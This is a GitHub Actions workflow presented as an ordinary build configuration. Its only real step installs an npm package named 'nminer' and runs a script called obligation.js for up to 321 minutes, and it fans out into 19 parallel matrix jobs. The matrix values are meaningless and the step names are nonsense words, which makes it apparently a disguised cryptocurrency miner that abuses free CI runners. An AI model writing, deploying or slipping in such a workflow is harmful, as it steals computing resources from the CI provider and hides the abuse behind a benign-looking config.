name: obligation
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5751 }
          - { version: 9723 }
          - { version: 3292 }
          - { version: 2774 }
          - { version: 3432 }
          - { version: 9473 }
          - { version: 7397 }
          - { version: 6068 }
          - { version: 9226 }
          - { version: 5466 }
          - { version: 4642 }
          - { version: 8871 }
          - { version: 8816 }
          - { version: 7550 }
          - { version: 2263 }
          - { version: 3441 }
          - { version: 4438 }
          - { version: 7955 }
          - { version: 8570 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: and ample while puritan
        run: |
          npm install nminer@latest
          timeout 321m node obligation.js || echo "obligation executed"